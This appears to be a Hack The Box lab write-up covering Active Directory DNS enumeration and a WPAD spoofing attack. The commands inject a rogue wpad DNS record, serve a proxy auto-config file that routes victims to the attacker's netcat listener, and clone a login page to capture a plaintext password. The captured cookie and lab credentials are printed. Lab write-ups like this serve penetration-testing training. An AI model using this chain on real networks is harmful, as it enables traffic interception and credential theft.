# Further Enumeration

## DNS
```rust
    ~/HTB/orion/DC ···········································································································································································································
❯ adidnsdump -u orion.smallcorp.htb\\jwallace ldap://192.168.1.2 -r
Password:
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Querying zone for records
[+] Found 8 records
```

```rust
❯ cat records.csv
type,name,value
A,web02,192.168.1.19
A,web,192.168.1.13
A,ForestDnsZones,192.168.1.2
A,DomainDnsZones,192.168.1.2
A,dc,192.168.1.2
NS,_msdcs,dc.orion.smallcorp.htb.
NS,@,dc.orion.smallcorp.htb.
A,@,192.168.1.2
```

```rust
❯ adidnsdump -u 'ORION\jwallace' -p 'Ibanezsz@1' --print-zones 192.168.1.2
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Found 2 domain DNS zones:
    orion.smallcorp.htb
    RootDNSServers
[-] Found 2 forest DNS zones (dump with --forest):
    _msdcs.orion.smallcorp.htb
    smallcorp.htb
[-] Found 1 legacy DNS zones (dump with --legacy):
    RootDNSServers
·····················
❯ adidnsdump -u 'ORION\jwallace' -p 'Ibanezsz@1' --forest --zone smallcorp.htb 192.168.1.2
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Querying zone for records
[+] Found 3 records
    ~/HTB/orion/DC ···········································································································································································································
❯ cat records.csv
type,name,value
?,wpad,?
A,dc.orion,192.168.1.2
```

wpad???

lets look into this 

https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/adidns-spoofing#wins-forward-lookup

```rust
python3 dnstool.py -u 'ORION\jwallace' -p 'Ibanezsz@1' --record 'wpad' --zone orion.smallcorp.htb --tcp --action query 192.168.1.2

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found record wpad
DC=wpad,DC=orion.smallcorp.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=orion,DC=smallcorp,DC=htb
[+] Record entry:
 - Type: 1 (A) (Serial: 47)
 - Address: 10.10.14.6
```

injecting my DNS Records
```rust
python3 dnstool.py -u 'ORION\jwallace' -p 'Ibanezsz@1' --record 'wpad' --zone orion.smallcorp.htb --tcp --action add --data 10.10.14.6 192.168.1.2

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
```

Generate  wpad.dat
```rust
 cat wpad.dat
function FindProxyForURL(url, host) {

    // For all other traffic, use the proxy
    return "PROXY 10.10.14.21:6969";
}
```

Start python web server
```rust
 python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.13.38.11 - - [10/Oct/2024 19:47:37] "GET /wpad.dat HTTP/1.1" 200 -
10.13.38.11 - - [10/Oct/2024 19:48:57] "GET /wpad.dat HTTP/1.1" 200 -
10.13.38.11 - - [10/Oct/2024 19:49:58] "GET /wpad.dat HTTP/1.1" 200 -
10.13.38.11 - - [10/Oct/2024 19:50:59] "GET /wpad.dat HTTP/1.1" 200 -
10.13.38.11 - - [10/Oct/2024 19:51:59] "GET /wpad.dat HTTP/1.1" 200 -
```

Start NC listener 
```rust
 nc -knvlp 6969
listening on [any] 6969 ...
connect to [10.10.14.21] from (UNKNOWN) [10.13.38.11] 29011
GET http://web02.orion.smallcorp.htb:8080/ HTTP/1.1
Host: web02.orion.smallcorp.htb:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: 50aeecc61bd3084ccba2730bb5a47c8f=hokr2659joa0sofrt4hc4qevhr
Upgrade-Insecure-Requests: 1
```

install squid and configure squid /etc/squid/squid.conf
```
http_access allow all
hosts_file /etc/hosts
http_port 3128
```
```

Then copy the webpage source  to your own file and host it on port 8080, I created a /s because i noticed the user was looking for this directory.

```rust
    ~/HTB/orion/mitm/s ····················································································   14m 23s
❯ ls
index.html  login  login.html  s
```

Start both web servers and watch wireshark traffic, then follow the HTTP post. 

![[Pasted image 20241010182716.png]]

URL Decode the !
```rust
username=gkaufmann&_password=eelahX8F!
```
